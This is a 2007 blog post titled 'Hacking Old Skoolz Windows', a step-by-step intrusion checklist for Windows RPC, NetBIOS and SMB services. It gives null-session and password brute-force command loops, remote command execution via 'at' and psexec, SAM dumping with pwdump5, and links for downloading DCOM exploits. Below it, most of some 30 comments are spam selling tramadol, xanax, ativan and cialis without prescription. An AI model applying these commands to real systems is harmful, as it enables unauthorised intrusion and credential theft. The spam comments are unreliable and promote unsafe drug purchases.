Saturday, June 16, 2007

Hacking Old Skoolz Windows

Port 135 (client-server communications)

Port 139, 445 (authentication and file sharing)

Port 137,138 (NetBIOS browser, name and lookup functions)



Look for port 135 endpoint mapping which includes, Microsoft Outlook, Exchange and Messenger Service.


Nmap server to look for port 135

Run rpcscan or epdump on server over port tcp or udp port 135

If udp port 1028, 1029 opened or tcp port 1025 opened, run rpcscan over those ports

Look for IFID 12345778-1234-abcd-ef00-0123456789ab and 12345778-1234-abcd-ef00-0123456789ac for both LSA and SAMR interface respectively. Can be found on all Windows NT OS using name pipes accessible through SMB session over TCP port 139 or 445.

Run walksam query if SMAR interface is present to glean user information.

Run rpcclient from backtrack if a valid username and password is given. LSARPC interface must be present

Compromise admin password using brute force tool WMICracker.

Use Remoxec to execute arbitrary commands.

Verify if server is vulnerable for RPC DCOM exploits. If patch MS03-026 and MS03-039 is applied, nothing can be done. Else download exploits from

http://packetstormsecurity.org/0307-exploits/dcom.c
http://packetstormsecurity.org/0307-exploits/DComExpl_UnixWin32.zip
http://packetstormsecurity.org/0307-exploits/rpcdcom.101.zip
http://packetstormsecurity.org/0307-exploits/oc192-dcom.c
http://examples.oreilly.com/networksa/tools/dcom-exploits.zip
http://www.securityfocus.com/bid/8205/exploit/


DCOM interface can be exploited through:

TCP and UDP port 135 (through RPC server service)
TCP ports 139 and 445 (through SMB and named pipes)
TCP port 593 (through COM Internet Services, if installed)
Use kaHt2 to exploit a remote shell
Use SPKIE msrpcfuzz fuzzer to do stress test.


-----------------------------------------------------------------------------------------

NetBIOS Name Service UDP port 137

Dumping NetBIOS table: Nbtstat –A 192.168.1.152

Local Area Connection:
Node IpAddress: [192.168.1.20] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
CARAA <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
CARAA <20> UNIQUE Registered
WORKGROUP <1E> GROUP Registered

MAC Address = 00-0D-88-CB-30-0B

------------------------------------------------

<00> unique hostname
<00> group domain name
<03> unique Messenger service running for that computer
<03> unique Messenger service running for that individual logged in user
<20> unique Server service running
<1D> group Master browser name for the subnet
<1B> unique Domain master browser name, identifies PDC for that domain
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0661


NetBIOS Datagram Service UDP port 138
http://www.securityfocus.com/advisories/2556


NetBIOS Session Service TCP port 139

Connect through null session:

net use \\192.168.1.152\IPC$ “” /user:””
net view \\192.168.1.152
Use tools like enum, GetAcct and winfo to enumerate more info.


Brute force user password through NetBIOS session service with tools like SMBCrack and SMB-AT or use Windows LOOP to find password.

1. Create a file credentials.txt with username and password:

Password Username
“” Administrator
Password Administrator
Admin Administrator

2. FOR /F “tokens=1,2*” %i in (credentials.txt) do net use \\192.168.1.152\IPC$ %i /user:%j

3. Using the NetBIOS tool with LOOP
FOR /L %i IN (1,1,254) DO nat –u userlist.txt –p passlist.txt 192.168.1.%i > out.txt


Connect through valid user:
Smbclient to enumerate more info.
net use \\192.168.1.152\C$ * /user:scadmin (Will prompt for a password)
net use \\192.168.1.152\C$ ronald3211 /user:scadmin
at \\192.168.1.152 00:04 c:\Windows\system32\cmd.exe

Modify and accessing registry keys using
Regdmp.exe
Regini.exe
Reg.exe

Accessing the SAM Database and LSASS

Pwdump5
Lsadump2



CIFS Service running on TCP and UDP port 445

SMB-AT to enumerate user and system info.
Smbserverscan to scan for smb related ports.
Smbgetserverinfo to get server info.
smbNAT to provide more details about the server info.

Smbdumpusers to enumerate port 139 and 445.
Smbdumpusers –i 192.168.1.152 –m 2 –P1

Smbbf to brute-force password grinding attacks against both NetBIOS and CIFS services.
Smbbf –i 192.168.1.152 –p wordlist.txt –u users.txt –v –P1

Need to have admin user name and password.
Samrdump to list all username in server
Rpcdump to list all endpoint bindings

Registry path for null session: HKLM\SYSTEM\CurrentControlSet\Control\Lsa
Restrictanonymous =0, 1, 2

Use pwdump5 to capture SAM file.
Use netcat to open a shell on remote OS
Use psexec through port 139 or 445 to execute command
Psexec \\192.168.1.152 –u Admin –p password –s cmd.exe


IIS buffer overflow

IIS 5.0 SSL Remote root exploit use thciisslame

32 comments:

Anonymous said...

Hoh ... lam00 & n00b

Anonymous said...

Can anyone recommend the top Patch Management tool for a small IT service company like mine? Does anyone use Kaseya.com or GFI.com? How do they compare to these guys I found recently: N-able N-central network security software
? What is your best take in cost vs performance among those three? I need a good advice please... Thanks in advance!

Anonymous said...

Amiable fill someone in on and this fill someone in on helped me alot in my college assignement. Thank you seeking your information.

viagra online said...

I wasn't aware that people still were trying to hack windows, Ill bet that it is quite a challenge, good luck on that.

Anonymous said...

buy tramadol online can you buy tramadol over the counter in the usa - tramadol 85 93

Anonymous said...

buy tramadol online buy tramadol in dubai - get through tramadol withdrawal

Anonymous said...

buy xanax online without rx mentax (generic xanax) - xanax dosage weight dogs

Anonymous said...

buy tramadol online tramadol hcl for dogs - tramadol reactions

Anonymous said...

tramadol 50mg if you overdose tramadol - online pharmacy tramadol overnight

Anonymous said...

buy tramadol online mekanisme kerja tramadol hcl - tramadol overdose symptoms dogs

Anonymous said...

buy tramadol online gettin high on tramadol - tramadol hcl para que serve

Anonymous said...

buy cheap carisoprodol soma carisoprodol tablets dosage - what is carisoprodol 350 mg for

Anonymous said...

Aw, this was a very nice post. Finding the time and
actual effort to make a superb article… but what
can I say… I put things off a lot and don't seem to get anything done.

My web site MEDAL OF HONOR WARFIGHTER mods

Anonymous said...

buy tramadol online order tramadol overnight mastercard - tramadol ingredients

Anonymous said...

buy tramadol online tramadol addiction message board - information on tramadol 50mg tablets

Anonymous said...

cialis online cialis going generic - generic cialis tadalafil reviews

Anonymous said...

buy cialis online cheap cialis without rx - buy cialis levitra

Anonymous said...

buy cialis online cialis 5mg. price in usa - can i buy cialis over the counter in the us

Anonymous said...

order tramadol no prescription tramadol hcl 50 mg ingredients - tramadol hcl 50 mg tablet

Anonymous said...

buy tramadol tablets tramadol 50 mg can you get high - buy tramadol egypt

Anonymous said...

http://landvoicelearning.com/#57594 tramadol for cats overdose - buy tramadol online by cod

Anonymous said...

buy tramadol buy tramadol store - where to buy tramadol online forum

Anonymous said...

tramadol online buy 180 tramadol online - tramadol 100 mg experience

Anonymous said...

http://reidmoody.com/#79166 ativan withdrawal alcohol - ativan buzz

Anonymous said...

buy ativan online side effects of .5 ativan - ativan high how much

Anonymous said...

Your oωn repогt has confіrmed necеssary to uѕ.
It’s νегy eԁucational and уou reаlly
are naturаlly гeally experienced οf this tyρe.
You have got οpenеԁ up my ρеrѕοnal еyе іn orԁer to vаriouѕ ѵiews on this kind of subject using
іntriquing, notable and sοund written сοntеnt.
Feel free to visit my web-site : Buy Valium

Anonymous said...

buy ativan online lorazepam 1 mg mylan - effects of ativan addiction

Anonymous said...

ways to buy ativan online ativan effects - order ativan canada

Anonymous said...

buy tramadol online with mastercard buy tramadol ships florida - tramadol hcl percocet

Anonymous said...

buy tramadol online tramadol overdose info - what is ultram tramadol hcl

Anonymous said...

xanax online 1mg xanax 1 beer - 2mg xanax and 2 beers

Anonymous said...

http://www.achildsplace.org/banners/tramadolonline/#5744 order tramadol online mastercard - buy tramadol online mastercard overnight